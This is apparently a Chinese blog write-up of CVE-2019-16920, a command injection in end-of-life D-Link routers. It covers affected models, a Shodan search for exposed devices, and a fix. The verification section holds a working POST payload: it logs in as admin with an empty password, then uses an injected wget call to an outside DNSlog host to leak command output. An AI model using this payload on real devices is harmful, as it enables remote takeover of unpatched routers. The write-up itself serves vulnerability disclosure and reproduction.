admin 管理员组

文章数量: 887021

【CVE

目录

  • 0x00 漏洞概述
  • 0x01 影响版本
  • 0x02 漏洞评级
  • 0x03 shodan搜索漏洞环境
  • 0x04 漏洞验证
  • 0x05 修复建议

0x00 漏洞概述

友讯科技股份有限公司(D-Link Corporation)是一家台湾科技公司,总部位于台北市内湖区,于1986年由高次轩成立。公司专注于电脑网络设备的设计开发,自创“D-Link”品牌,主要生产制造消费者及企业所使用的无线网络和以太网硬件产品。

2019年9月,Fortinet的FortiGuard Labs发现并向官方反馈了D-Link产品中存在的一个未授权命令注入漏洞(CVE-2019-16920),成功利用该漏洞后,攻击者可以在设备上实现远程代码执行(RCE)。由于攻击者无需通过身份认证就能远程触发该漏洞,因此该漏洞标记为高危级别漏洞。

0x01 影响版本

搭载最新版固件的如下D-Link产品存在该漏洞:

DIR-655
DIR-866L
DIR-652
DHP-1565

0x02 漏洞评级

高危

0x03 shodan搜索漏洞环境

使用shodan搜索"DIR-652"。(由于发现漏洞时,这些存在该漏洞的设备已经超出了服务周期,这意味着厂商不会再为发现的问题提供补丁。)

找到受影响版本的D-Link产品。

0x04 漏洞验证

输入用户名(这里使用 admin),密码为空,然后登陆并使用Burp抓包。

然后将POST请求的data部分修改为如下代码。(由于该命令执行结果无法回显到页面上,这里使用DNSlog把执行结果进行回显。其中t00ls.fa7b0b1880604***************dbe6.tu4为DNS服务器地址。)

html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20http://`whoami`.t00ls.fa7b0b1880604***************dbe6.tu4

发送请求后,在DNSlog上发现命令执行结果,说明复现成功。

如需了解漏洞原理,建议参考此篇文章:

0x05 修复建议

由于发现漏洞时,这些存在该漏洞的设备已经超出了服务周期,这意味着厂商不会再为发现的问题提供补丁。所以建议D-Link用户升级到最新产品。

本文标签: CVE